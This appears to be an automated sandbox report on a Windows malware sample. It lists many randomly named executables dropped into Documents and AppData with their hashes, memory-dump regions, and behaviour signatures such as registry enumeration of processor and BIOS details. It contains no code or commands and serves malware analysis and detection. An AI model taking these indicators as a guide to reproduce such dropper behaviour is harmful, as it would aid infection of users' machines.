| SHA512 | a92e76367acd21f9a9f29d2ef7ad435686b2bc43a25b46e90e0d5c3ccc0494c14b499a48150cb6b83ee8718eab19f271e38505326e9d745cb3c402fbd1b5f4cf |
C:\Users\Admin\Documents\XczKdLIjFYQVytac2MjDNll1.exe
| MD5 | 25b1f480760dd65b48c99c4b64a8375c |
| SHA1 | a35e4dc7cfca592a28fba766882d152c6e76f659 |
| SHA256 | f10ecdde41dded7dc8e3a0b79c672bd6e9f1f23e31bbc011fb771811181ea11c |
| SHA512 | c1ad586717b10ac516b7af4a9ab779e86101cfd26a2c996b39bd0066723c8bac34db5c5e77604bfe00ef6ec5916563d34913c03cae7088433b949881b6438d42 |
memory/1148-193-0x0000000005600000-0x0000000005601000-memory.dmp
memory/504-200-0x0000000001780000-0x000000000179C000-memory.dmp
memory/1704-198-0x000000001B6D0000-0x000000001B6D2000-memory.dmp
memory/4880-202-0x0000000005350000-0x0000000005351000-memory.dmp
memory/1148-201-0x0000000005050000-0x0000000005051000-memory.dmp
memory/1632-205-0x0000000000D60000-0x0000000000D61000-memory.dmp
C:\Users\Admin\Documents\B6Wxfafbpe4OIYb1e2r7Evf1.exe
| MD5 | 41c97e6248c6939d50df1c99ab04679d |
| SHA1 | 0af10b82aa8619e285627de8e7af52b772e8ed18 |
| SHA256 | b511da29b61e72108cc597ad72ecb1f920d22d9bfc0bb5ff4e3d33d9da7995ea |
| SHA512 | 04ef83f1402c630cb57a4793f74bbf78ae06bb7f9f78fe071a4303a3949feec7cb2ef1698981116ec13020e6e25ecaf92cedfe1a55838a578a46fb0de3a50677 |
memory/1148-203-0x0000000005350000-0x0000000005351000-memory.dmp
memory/4880-209-0x00000000052D0000-0x00000000052D1000-memory.dmp
memory/2240-208-0x0000000000000000-mapping.dmp
memory/2240-213-0x0000000000400000-0x0000000000414000-memory.dmp
memory/4880-210-0x0000000005570000-0x0000000005571000-memory.dmp
memory/504-207-0x000000001BE00000-0x000000001BE02000-memory.dmp
memory/1148-216-0x0000000005050000-0x00000000055F6000-memory.dmp
C:\Users\Admin\Documents\3wpzV7LHpsW8SeHdznOlDVhr.exe
| MD5 | 58f5dca577a49a38ea439b3dc7b5f8d6 |
| SHA1 | 175dc7a597935b1afeb8705bd3d7a556649b06cf |
| SHA256 | 857dd46102aea53f0cb7934b96410ebbc3e7988d38dcafdc8c0988f436533b98 |
| SHA512 | 3c75c0cbbbc14bd25b4feb141fd1595ce02469da50432fb48400eb089d6150fe87831ccc775d921eeec697af7aad33a35fadcfd2ec775aeee1ce34355af7338a |
C:\Users\Admin\Documents\3wpzV7LHpsW8SeHdznOlDVhr.exe
| MD5 | 58f5dca577a49a38ea439b3dc7b5f8d6 |
| SHA1 | 175dc7a597935b1afeb8705bd3d7a556649b06cf |
| SHA256 | 857dd46102aea53f0cb7934b96410ebbc3e7988d38dcafdc8c0988f436533b98 |
| SHA512 | 3c75c0cbbbc14bd25b4feb141fd1595ce02469da50432fb48400eb089d6150fe87831ccc775d921eeec697af7aad33a35fadcfd2ec775aeee1ce34355af7338a |
memory/1968-218-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\is-9P408.tmp\3wpzV7LHpsW8SeHdznOlDVhr.tmp
| MD5 | ffcf263a020aa7794015af0edee5df0b |
| SHA1 | bce1eb5f0efb2c83f416b1782ea07c776666fdab |
| SHA256 | 1d07cfb7104b85fc0dffd761f6848ad176117e146bbb4079fe993efa06b94c64 |
| SHA512 | 49f2b062adfb99c0c7f1012c56f0b52a8850d9f030cc32073b90025b372e4eb373f06a351e9b33264967427b8174c060c8a6110979f0eaf0872f7da6d5e4308a |
memory/1632-222-0x00000000057B0000-0x00000000057B1000-memory.dmp
memory/664-223-0x0000000000D40000-0x0000000000D41000-memory.dmp
memory/1968-226-0x00000000031C0000-0x00000000031FC000-memory.dmp
memory/4800-229-0x0000000000D60000-0x0000000000D61000-memory.dmp
memory/4800-234-0x0000000005B80000-0x0000000005B81000-memory.dmp
memory/1968-235-0x0000000005A60000-0x0000000005A61000-memory.dmp
memory/1968-232-0x00000000020A0000-0x00000000020A1000-memory.dmp
memory/1968-233-0x0000000005A50000-0x0000000005A51000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-17BMG.tmp\itdownload.dll
| MD5 | d82a429efd885ca0f324dd92afb6b7b8 |
| SHA1 | 86bbdaa15e6fc5c7779ac69c84e53c43c9eb20ea |
| SHA256 | b258c4d7d2113dee2168ed7e35568c8e03341e24e3eafc7a22a0d62e32122ef3 |
| SHA512 | 5bf0c3b8fa5db63205a263c4fa5337188173248bef609ba4d03508c50db1fd1e336f3041ce96d78cc97659357a83e6e422f5b079d893a20a683270e05f5438df |
C:\Users\Admin\AppData\Local\Temp\is-17BMG.tmp\itdownload.dll
| MD5 | d82a429efd885ca0f324dd92afb6b7b8 |
| SHA1 | 86bbdaa15e6fc5c7779ac69c84e53c43c9eb20ea |
| SHA256 | b258c4d7d2113dee2168ed7e35568c8e03341e24e3eafc7a22a0d62e32122ef3 |
| SHA512 | 5bf0c3b8fa5db63205a263c4fa5337188173248bef609ba4d03508c50db1fd1e336f3041ce96d78cc97659357a83e6e422f5b079d893a20a683270e05f5438df |
memory/4664-238-0x0000000002590000-0x000000000259A000-memory.dmp
memory/4800-245-0x00000000055A0000-0x00000000055A1000-memory.dmp
memory/664-244-0x0000000005580000-0x0000000005581000-memory.dmp
memory/1704-257-0x000000001B900000-0x000000001B901000-memory.dmp
memory/4800-264-0x0000000005550000-0x0000000005551000-memory.dmp
memory/1640-266-0x00000000026F0000-0x000000000271F000-memory.dmp
memory/1704-262-0x000000001DBB0000-0x000000001DBB1000-memory.dmp
memory/2672-261-0x0000000000000000-mapping.dmp
memory/400-260-0x00000000026E0000-0x00000000026F9000-memory.dmp
C:\Users\Admin\Documents\8MIzHsvXH1zfFpKG1WbmRIWh.exe
| MD5 | 30b15129d952fc93ad162ba53d38a6c7 |
| SHA1 | c8bf919dc1d1199778b4b5d456ac45f7e129576b |
| SHA256 | 0440a1f3e16842a1ca557f3f1bb4b3e27c48d0d107af2cee00b04a21af296d89 |
| SHA512 | 2c85d6f309c72f1a47ee2a0551b41783126c4176c4971466ede0292796da3b74302254a92f820651ca334df94da5a72f32e6d949a7cf23fc6e5eb7c078b5a7e9 |
memory/3672-254-0x0000000000400000-0x0000000000409000-memory.dmp
memory/1704-252-0x000000001DC20000-0x000000001DC21000-memory.dmp
memory/664-256-0x00000000053E0000-0x00000000053E1000-memory.dmp
memory/1968-251-0x0000000005A80000-0x0000000005A81000-memory.dmp
C:\Users\Admin\Documents\aeRdKRut5ZCEjYsLcmXpklIj.exe
| MD5 | ff2d2b1250ae2706f6550893e12a25f8 |
| SHA1 | 5819d925377d38d921f6952add575a6ca19f213b |
| SHA256 | ca46080e121408d9624322e505dc2178ba99e15871c90e101b54e42ea7b54a96 |
| SHA512 | c66544678f3dd49aa1a23cd459a556d923ba44c5d88334a165ea7bd16e4561955536546627b7e83bf1e759428c04b6312e08fdc8c2f6fab69cd29f3b62ce3d23 |
memory/1968-246-0x0000000005A70000-0x0000000005A71000-memory.dmp
memory/3672-248-0x0000000000000000-mapping.dmp
memory/1704-243-0x000000001B680000-0x000000001B69B000-memory.dmp
memory/1456-241-0x00000000026D0000-0x00000000026D9000-memory.dmp
memory/3324-242-0x0000000000000000-mapping.dmp
memory/4800-240-0x0000000005660000-0x0000000005661000-memory.dmp
memory/4800-236-0x0000000005520000-0x0000000005521000-memory.dmp
memory/2672-265-0x0000000000400000-0x0000000000420000-memory.dmp
memory/1148-268-0x0000000006630000-0x000000000667E000-memory.dmp
memory/4952-272-0x00000000024C0000-0x00000000024F0000-memory.dmp
memory/1148-273-0x0000000006720000-0x0000000006721000-memory.dmp
C:\Users\Admin\Documents\j62NJTQboyYOvarl8jrAa8lQ.exe
| MD5 | ec5c1f5a598d85d60d987827a31746a1 |
| SHA1 | 56cd531452c3e3a5baecb0abe4b032997155aaec |
| SHA256 | ab59e845bc16961db7c3f2f8249083cff0098b263dc37b7d2819b223153d2ebe |
| SHA512 | 3705d1e5777a4d9b36b2f8f382277e301c5796e1f940c5e2387bc17b671e1511cd1bebc41e834265f491c13226338cb9415b45c33f347b4d4752e4ce20b72a13 |
memory/1968-270-0x0000000005A90000-0x0000000005A91000-memory.dmp
memory/1968-275-0x0000000005AA0000-0x0000000005AA1000-memory.dmp
memory/4800-277-0x00000000057D0000-0x00000000057D1000-memory.dmp
memory/1968-278-0x0000000005AB0000-0x0000000005AB1000-memory.dmp
memory/1900-281-0x0000000000000000-mapping.dmp
memory/1968-279-0x0000000005AC0000-0x0000000005AC1000-memory.dmp
C:\Users\Admin\Documents\B6Wxfafbpe4OIYb1e2r7Evf1.exe
| MD5 | 41c97e6248c6939d50df1c99ab04679d |
| SHA1 | 0af10b82aa8619e285627de8e7af52b772e8ed18 |
| SHA256 | b511da29b61e72108cc597ad72ecb1f920d22d9bfc0bb5ff4e3d33d9da7995ea |
| SHA512 | 04ef83f1402c630cb57a4793f74bbf78ae06bb7f9f78fe071a4303a3949feec7cb2ef1698981116ec13020e6e25ecaf92cedfe1a55838a578a46fb0de3a50677 |
memory/1968-288-0x0000000005AE0000-0x0000000005AE1000-memory.dmp
memory/1968-295-0x0000000005B00000-0x0000000005B01000-memory.dmp
memory/1900-293-0x0000000000C20000-0x0000000000C21000-memory.dmp
memory/2948-290-0x0000000000000000-mapping.dmp
memory/2672-292-0x0000000005690000-0x0000000005CA8000-memory.dmp
memory/1968-289-0x0000000005AF0000-0x0000000005AF1000-memory.dmp
C:\Users\Admin\AppData\Roaming\1610538.exe
| MD5 | 7aa6d9bfdbdfa9e112e7e0f46cc845f0 |
| SHA1 | ab7a147ea36cc3766eebbe382e8caabba013f6ab |
| SHA256 | b7d035c385cc2ccdb11d4e1784908abb791e04672fe5f72e8523300c3db1426b |
| SHA512 | 966746437dc07172b13c3928d356d638726492377d33b9d39bca8addcae2ec464d363a23de5e1c17a40f35689d88b5b28884a3f378861b5dcaf0a214a22a23ce |
memory/3148-299-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\1610538.exe
| MD5 | 7aa6d9bfdbdfa9e112e7e0f46cc845f0 |
| SHA1 | ab7a147ea36cc3766eebbe382e8caabba013f6ab |
| SHA256 | b7d035c385cc2ccdb11d4e1784908abb791e04672fe5f72e8523300c3db1426b |
| SHA512 | 966746437dc07172b13c3928d356d638726492377d33b9d39bca8addcae2ec464d363a23de5e1c17a40f35689d88b5b28884a3f378861b5dcaf0a214a22a23ce |
memory/1968-283-0x0000000005AD0000-0x0000000005AD1000-memory.dmp
C:\Users\Admin\AppData\Roaming\6714308.exe
| MD5 | 3598180fddc06dbd304b76627143b01d |
| SHA1 | 1d39b0dd8425359ed94e606cb04f9c5e49ed1899 |
| SHA256 | 44a280749c51af08ff5c1aebcda01c36935f7ecb66d15f57e53c022ce0426bda |
| SHA512 | 8f77e49e2868dc9655dd5af20645799fb42940ca50f9dd0371bba9128286348ab3cbf09467f21b60d2596a0af6c755a43b92a26037b8dfae2e957602ff46ec9d |
memory/2948-305-0x0000000000CA0000-0x0000000000CA1000-memory.dmp
memory/4164-309-0x0000000000400000-0x0000000000420000-memory.dmp
C:\Users\Admin\AppData\Roaming\6269809.exe
| MD5 | f194d7ae32b3bb8d9cb2e568ea60e962 |
| SHA1 | 2e96571159c632c6782c4af0c598d838e856ae0b |
| SHA256 | 88184a929722705ecf5fd0631703e8b11f20a7a3145d2d94c18401cdb63d4221 |
| SHA512 | fbdc1c143d84f2fbbe688a3b26cf3258e127f99a56632f995e8e435c0143b71cfb8b45fd272ba8d40363908fb7b547fad55a289f449fc0bd568fc0c021044691 |
C:\Users\Admin\AppData\Roaming\6269809.exe
| MD5 | f194d7ae32b3bb8d9cb2e568ea60e962 |
| SHA1 | 2e96571159c632c6782c4af0c598d838e856ae0b |
| SHA256 | 88184a929722705ecf5fd0631703e8b11f20a7a3145d2d94c18401cdb63d4221 |
| SHA512 | fbdc1c143d84f2fbbe688a3b26cf3258e127f99a56632f995e8e435c0143b71cfb8b45fd272ba8d40363908fb7b547fad55a289f449fc0bd568fc0c021044691 |
memory/1900-321-0x000000001BA50000-0x000000001BA52000-memory.dmp
C:\Users\Admin\AppData\Roaming\4402357.exe
| MD5 | a4118db763f38f44c6869f3d46442aa0 |
| SHA1 | 6842ee38f9fc7fc7d0aa7b3eaff33e9d2de507b3 |
| SHA256 | daa06f4f0bc4c42eba48a486cc1497d31c594704b23f36855c71a3ba4dd0c49e |
| SHA512 | 577a92cb503a8de18b18c296b8617f7bcce9bf032a480cda529b2a0b0247cb5fcc165d54bd7cab9eeb5c4a3e7a64f172ccb39b1d0b9d12e1cc2f9e353eb1086f |
memory/1968-317-0x0000000005B60000-0x0000000005B61000-memory.dmp
memory/1968-316-0x0000000005B50000-0x0000000005B51000-memory.dmp
C:\Users\Admin\Documents\m63bk7jXXCHYPXwc1lnnDPZY.exe
| MD5 | 038bd2ee88ff4c4990fc6328229b7702 |
| SHA1 | 7c80698a230be3c6733ded3ee7622fe356c3cb7d |
| SHA256 | a9963528ae516477d9441d7ed9e9b28ea33c055661a8cafa4b6d541e14317e7e |
| SHA512 | 6dac9efbecbd525129ce56d9f0f620e101afca8e91e23c48b6f377711d3a9b97fac1d38f8de8c57b73e309b57ebaac7bf152b207c166c0a6ce3eac2b49cac03e |
memory/1968-310-0x0000000005B40000-0x0000000005B41000-memory.dmp
memory/4044-307-0x0000000000000000-mapping.dmp
memory/1968-306-0x0000000005B30000-0x0000000005B31000-memory.dmp
C:\Users\Admin\AppData\Roaming\4402357.exe
| MD5 | a4118db763f38f44c6869f3d46442aa0 |
| SHA1 | 6842ee38f9fc7fc7d0aa7b3eaff33e9d2de507b3 |
| SHA256 | daa06f4f0bc4c42eba48a486cc1497d31c594704b23f36855c71a3ba4dd0c49e |
| SHA512 | 577a92cb503a8de18b18c296b8617f7bcce9bf032a480cda529b2a0b0247cb5fcc165d54bd7cab9eeb5c4a3e7a64f172ccb39b1d0b9d12e1cc2f9e353eb1086f |
memory/1968-302-0x0000000005B20000-0x0000000005B21000-memory.dmp
memory/4164-304-0x0000000000000000-mapping.dmp
memory/1968-301-0x0000000005B10000-0x0000000005B11000-memory.dmp
C:\Users\Admin\AppData\Roaming\6714308.exe
| MD5 | 3598180fddc06dbd304b76627143b01d |
| SHA1 | 1d39b0dd8425359ed94e606cb04f9c5e49ed1899 |
| SHA256 | 44a280749c51af08ff5c1aebcda01c36935f7ecb66d15f57e53c022ce0426bda |
| SHA512 | 8f77e49e2868dc9655dd5af20645799fb42940ca50f9dd0371bba9128286348ab3cbf09467f21b60d2596a0af6c755a43b92a26037b8dfae2e957602ff46ec9d |
memory/4996-330-0x0000000000000000-mapping.dmp
memory/4496-329-0x0000000000000000-mapping.dmp
memory/1420-328-0x0000000000000000-mapping.dmp
memory/2364-326-0x0000000000000000-mapping.dmp
memory/2380-327-0x0000000000000000-mapping.dmp
memory/3724-342-0x0000000000000000-mapping.dmp
memory/4476-341-0x0000000000000000-mapping.dmp
memory/4900-340-0x0000000000000000-mapping.dmp
memory/2852-339-0x0000000000000000-mapping.dmp
memory/3060-338-0x0000000000000000-mapping.dmp
C:\Users\Admin\Documents\36H0x_pEZxGQ648xkMBepoMB.exe
| MD5 | e4deef56f8949378a1c650126cc4368b |
| SHA1 | cc62381e09d237d1bee1f956d7a051e1cc23dc1f |
| SHA256 | fd9d10b2598d0e12b25bf26410a0396667901fb8150085650b8415d58ccdb8ac |
| SHA512 | d84bbb39c05503ba428600ced4342ed77db6437ea142af33e34374691f055020b845152382d0516cf105e3379d6d20fa1c204c2799773f3a559bdbc38e0a9ffd |
C:\Users\Admin\Documents\36H0x_pEZxGQ648xkMBepoMB.exe
| MD5 | e4deef56f8949378a1c650126cc4368b |
| SHA1 | cc62381e09d237d1bee1f956d7a051e1cc23dc1f |
| SHA256 | fd9d10b2598d0e12b25bf26410a0396667901fb8150085650b8415d58ccdb8ac |
| SHA512 | d84bbb39c05503ba428600ced4342ed77db6437ea142af33e34374691f055020b845152382d0516cf105e3379d6d20fa1c204c2799773f3a559bdbc38e0a9ffd |
C:\Users\Admin\Documents\_mOR0RAfOsExG638NCtHjm6B.exe
| MD5 | c7ccbd62c259a382501ff67408594011 |
| SHA1 | c1dca912e6c63e3730f261a3b4ba86dec0acd5f3 |
| SHA256 | 8cfa7e9bc6cbd458cec18a25e6f763a3776802490e6b3d451d864c4dba50c437 |
| SHA512 | 5f5958363820795f96fff6ad71bc1b59ec01a6a24876c5d22d48efaa49bc55373fca1f8e927c23547cdb494ba46b6d3871f377e607c97d9f10d4e0636ac7ef2b |
C:\Users\Admin\Documents\qV5dvKCOf3jbI4p4wHoY7HtS.exe
| MD5 | 44c355ae8cc3ecc4a95b5716fb9635fd |
| SHA1 | f4d46438cad6fac2be4fb08cf6972a8306e5e12a |
| SHA256 | f77f16151eb30569f7f1276063f67100c6ad439fde9d07605c5ae5e0c9eb8b7d |
| SHA512 | 46ab10861ff330796bd7e60c71e474ebb7a44d2000eea9d56c4fcc27d6b1e1c643996c91d6261f107aa5b86b3bbaf38c23be4705a6fcc3a587bd9d7422c7f259 |
C:\Users\Admin\Documents\jKLSPhadj6e2QQLlPuXVqGnE.exe
| MD5 | 6eab2a9353bf7254d1d583489d8317e2 |
| SHA1 | 553754576adb15c7a2a4d270b2a2689732002165 |
| SHA256 | 4aefb36ac35b1cc94895ea4459cc8e51e88a9fa8e957b94617d66a2c841e182b |
| SHA512 | 9c5a4f15794418adcce63246fdba9209fe6a9df25d5044e93de8f80e68e92e246db82bb66c3ac5f4815c81570df9588caa63b8d4099e07e9da840754f71ca569 |
memory/3120-332-0x0000000002850000-0x0000000002866000-memory.dmp
C:\Users\Admin\Documents\B6Wxfafbpe4OIYb1e2r7Evf1.exe
| MD5 | 41c97e6248c6939d50df1c99ab04679d |
| SHA1 | 0af10b82aa8619e285627de8e7af52b772e8ed18 |
| SHA256 | b511da29b61e72108cc597ad72ecb1f920d22d9bfc0bb5ff4e3d33d9da7995ea |
| SHA512 | 04ef83f1402c630cb57a4793f74bbf78ae06bb7f9f78fe071a4303a3949feec7cb2ef1698981116ec13020e6e25ecaf92cedfe1a55838a578a46fb0de3a50677 |
C:\Users\Admin\Documents\3vLa7ArANMnSow_dFvTpjPtT.exe
| MD5 | a84a527c4444287e412b4ab44bc63c9c |
| SHA1 | f1319320c69c6bfc4e7e6d82783b0bd6da19d053 |
| SHA256 | 5f482c3724bfbe5e7b934e2e48dcc2026ab35667d960a1c9ba3779165f594916 |
| SHA512 | a87ee15748adb35c49796a7a7e717aafecccfd1f3916f3f15cd350efc4945daee6930d53f5e072e05d169d302fa1c9bde5d4cb61289bfb56f09e9512efe2bbf4 |
C:\Users\Admin\Documents\3vLa7ArANMnSow_dFvTpjPtT.exe
| MD5 | a84a527c4444287e412b4ab44bc63c9c |
| SHA1 | f1319320c69c6bfc4e7e6d82783b0bd6da19d053 |
| SHA256 | 5f482c3724bfbe5e7b934e2e48dcc2026ab35667d960a1c9ba3779165f594916 |
| SHA512 | a87ee15748adb35c49796a7a7e717aafecccfd1f3916f3f15cd350efc4945daee6930d53f5e072e05d169d302fa1c9bde5d4cb61289bfb56f09e9512efe2bbf4 |
memory/4900-354-0x0000000001040000-0x0000000001050000-memory.dmp
C:\Users\Admin\Documents\oYP9zRm_dNH8VgV3gPUOmB9X.exe
| MD5 | 94c78c311f499024a9f97cfdbb073623 |
| SHA1 | 50e91d3eaa06d2183bf8c6c411947304421c5626 |
| SHA256 | 6aef62b3b8890bc22dd99f9b0d48247ae52c69e7ad9e384332658e73c725e40e |
| SHA512 | 29b61f1924f19d073460332950c2316acf769aa40ad7f62a41941160cd8a8da5958e8f96183e0e498afe8558fc3efb3a23f66c7519c142c780c91279ddecb545 |
C:\Users\Admin\Documents\oYP9zRm_dNH8VgV3gPUOmB9X.exe
| MD5 | 94c78c311f499024a9f97cfdbb073623 |
| SHA1 | 50e91d3eaa06d2183bf8c6c411947304421c5626 |
| SHA256 | 6aef62b3b8890bc22dd99f9b0d48247ae52c69e7ad9e384332658e73c725e40e |
| SHA512 | 29b61f1924f19d073460332950c2316acf769aa40ad7f62a41941160cd8a8da5958e8f96183e0e498afe8558fc3efb3a23f66c7519c142c780c91279ddecb545 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\m63bk7jXXCHYPXwc1lnnDPZY.exe.log
| MD5 | 40e179d3fb083a63386724041717ebf4 |
| SHA1 | 17b514f6e9e91755e00356fa833a5b5ffc0ec02d |
| SHA256 | e1f7a550509d618fd4fc44e69b899c403b2b7ad7c0f86f35c2118e2eadcdc399 |
| SHA512 | df14d16342e1678439de2c8e9bd5b4a3cd64eb767e4e7378d120f1660f9a49b7177abf60d77a73e180718889054a60174fcb518cacee2066245b869441dd4202 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\B6Wxfafbpe4OIYb1e2r7Evf1.exe.log
| MD5 | e07da89fc7e325db9d25e845e27027a8 |
| SHA1 | 4b6a03bcdb46f325984cbbb6302ff79f33637e19 |
| SHA256 | 94ab73c00494d10a2159175b81e23047621451e3a566e5a0b1222379db634aaf |
| SHA512 | 1e33e34595ebb6ce129d0244199d29722c916c036da542c3001f84b10a964b96cec7a9fdd19e120d7840614b307b504be993a4f8538d54382aa4944575476dda |
memory/4900-366-0x0000000001330000-0x0000000001342000-memory.dmp
C:\Users\Admin\Documents\RZD4oho8I4zDqCNSUS5wG0QB.exe
| MD5 | 7c34cf01cf220a4caf2feaee9a187b77 |
| SHA1 | 700230ccddb77c860b718aee7765d25847c52cbf |
| SHA256 | bbfe7a85b5e34c8b000529b0bac402a6d225ffd0eb2ffdad120326a34e4b7608 |
| SHA512 | b2c24c363ce8bdda92c4def2afa57995cf0ed7b0feda1082a979f14edc73b87ce171adcf337dd85a9b5b5daaa90471a65a3f7506a02da3af92e2e7b56451baa3 |
C:\Users\Admin\Documents\RZD4oho8I4zDqCNSUS5wG0QB.exe
| MD5 | 7c34cf01cf220a4caf2feaee9a187b77 |
| SHA1 | 700230ccddb77c860b718aee7765d25847c52cbf |
| SHA256 | bbfe7a85b5e34c8b000529b0bac402a6d225ffd0eb2ffdad120326a34e4b7608 |
| SHA512 | b2c24c363ce8bdda92c4def2afa57995cf0ed7b0feda1082a979f14edc73b87ce171adcf337dd85a9b5b5daaa90471a65a3f7506a02da3af92e2e7b56451baa3 |
C:\Users\Admin\Documents\eLCkNwHAgOHnUjHUl5w4wbkB.exe
| MD5 | a6ef5e293c9422d9a4838178aea19c50 |
| SHA1 | 93b6d38cc9376fa8710d2df61ae591e449e71b85 |
| SHA256 | 94ae283f87d31de4b9ae3344c469239be735621cd7546e95dfa70afa028507a0 |
| SHA512 | b5a999ca504efb49bcb209dcc1791dd77eded67f798590deb25a545009c2ad7577c8edc376b0f6c26140f82ecb5196b0a821be0cede6cdf65938ee174bfd4454 |
C:\Users\Admin\Documents\eLCkNwHAgOHnUjHUl5w4wbkB.exe
| MD5 | a6ef5e293c9422d9a4838178aea19c50 |
| SHA1 | 93b6d38cc9376fa8710d2df61ae591e449e71b85 |
| SHA256 | 94ae283f87d31de4b9ae3344c469239be735621cd7546e95dfa70afa028507a0 |
| SHA512 | b5a999ca504efb49bcb209dcc1791dd77eded67f798590deb25a545009c2ad7577c8edc376b0f6c26140f82ecb5196b0a821be0cede6cdf65938ee174bfd4454 |
C:\Users\Admin\Documents\FlfGkKyliXtbVPnQShveCOZZ.exe
| MD5 | be5ac1debc50077d6c314867ea3129af |
| SHA1 | 2de0add69b7742fe3e844f940464a9f965b6e68f |
| SHA256 | 577643f523646cd00dedf577aeb5848405cc29518cabb4dec9ca6bcb316f9abd |
| SHA512 | 7ff22965ddce1830fbf9b05bcf19da894378f73d423c591d45397d952729ee1d0d816fd2e87e91269f6969849ecb94ab8b86f3933fd723a9e2cdea024958c324 |
memory/4676-365-0x0000000000000000-mapping.dmp
memory/4472-348-0x0000000000000000-mapping.dmp
memory/1420-384-0x0000000002E40000-0x0000000002E6F000-memory.dmp
memory/4164-388-0x00000000052C0000-0x00000000058D8000-memory.dmp
memory/4996-392-0x0000000004E70000-0x0000000005416000-memory.dmp
memory/2364-397-0x0000000004D00000-0x0000000004D01000-memory.dmp
memory/8-401-0x0000000000000000-mapping.dmp
memory/1952-407-0x0000000000000000-mapping.dmp
memory/4656-409-0x0000000000000000-mapping.dmp
memory/4044-406-0x0000000000AD0000-0x0000000000AD1000-memory.dmp
memory/2912-419-0x00000000008C0000-0x00000000008C3000-memory.dmp
memory/3148-417-0x0000000005920000-0x0000000005921000-memory.dmp
memory/3540-415-0x0000000000000000-mapping.dmp
memory/2912-412-0x0000000000000000-mapping.dmp
memory/4496-429-0x0000000002540000-0x000000000256F000-memory.dmp
memory/4840-436-0x0000000000000000-mapping.dmp
memory/1992-439-0x0000000000000000-mapping.dmp
memory/1704-431-0x000000001B6D2000-0x000000001B6D4000-memory.dmp
memory/1740-434-0x0000000000000000-mapping.dmp
memory/4484-428-0x0000000000000000-mapping.dmp
memory/1704-446-0x000000001B6D4000-0x000000001B6D5000-memory.dmp
memory/4476-460-0x0000000003FF0000-0x000000000408D000-memory.dmp
memory/5368-459-0x0000000000000000-mapping.dmp
memory/2852-465-0x0000000005D30000-0x0000000005D31000-memory.dmp
memory/4164-462-0x000000007F020000-0x000000007F021000-memory.dmp
memory/3060-456-0x00000000040B0000-0x00000000040E0000-memory.dmp
memory/5528-477-0x0000000000000000-mapping.dmp
memory/1740-482-0x00000000050C0000-0x00000000056D8000-memory.dmp
memory/4472-485-0x0000000005E20000-0x0000000005E21000-memory.dmp
memory/5692-481-0x0000000000000000-mapping.dmp
memory/3540-487-0x000001D98B9E0000-0x000001D98BA4F000-memory.dmp
memory/3540-490-0x000001D98BA50000-0x000001D98BB1F000-memory.dmp
memory/5840-492-0x0000000000000000-mapping.dmp
memory/5988-497-0x0000000000000000-mapping.dmp
memory/5856-493-0x0000000000000000-mapping.dmp
memory/5856-506-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2244-508-0x0000000000000000-mapping.dmp
memory/8-500-0x00000000042C0000-0x00000000043C5000-memory.dmp
memory/6028-503-0x0000000000000000-mapping.dmp
memory/2244-514-0x0000000000700000-0x0000000000701000-memory.dmp
memory/2244-516-0x0000000005A50000-0x0000000005A51000-memory.dmp
memory/2244-518-0x0000000005A60000-0x0000000005A61000-memory.dmp
memory/2244-520-0x0000000005A70000-0x0000000005A71000-memory.dmp
memory/5840-519-0x00000000029B0000-0x00000000029B1000-memory.dmp
memory/2244-521-0x0000000005A80000-0x0000000005A81000-memory.dmp
memory/2232-535-0x0000000000000000-mapping.dmp
memory/4632-554-0x0000000000000000-mapping.dmp
memory/4048-555-0x0000000000000000-mapping.dmp
memory/1516-552-0x0000000000000000-mapping.dmp
memory/1832-551-0x0000000000000000-mapping.dmp
memory/3604-558-0x0000000000000000-mapping.dmp
memory/1520-568-0x0000000000000000-mapping.dmp
memory/832-567-0x0000000000000000-mapping.dmp
memory/3940-565-0x0000000000000000-mapping.dmp
memory/3880-562-0x0000000000000000-mapping.dmp
memory/4696-561-0x0000000000000000-mapping.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2021-08-22 20:10
Reported
2021-08-22 20:41
Platform
win11
Max time kernel
586s
Max time network
1594s
Command Line
Signatures
Suspicious use of NtCreateProcessExOtherParentProcess
| Description | Indicator | Process | Target |
| PID 4584 created 4624 | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Setup (13).exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\AppCompat\Programs\Amcache.hve.tmp | C:\Windows\SysWOW64\WerFault.exe | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Setup (13).exe |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\sihclient.exe | N/A |
